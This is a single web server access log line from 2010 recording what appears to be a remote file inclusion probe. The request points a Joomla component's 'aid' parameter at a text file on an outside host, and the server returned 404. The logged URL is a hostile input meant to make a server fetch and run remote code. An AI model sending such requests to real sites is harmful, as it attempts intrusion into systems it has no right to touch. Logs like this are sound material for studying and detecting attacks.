213.128.84.14 - - [01/Jun/2010:04:15:14 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
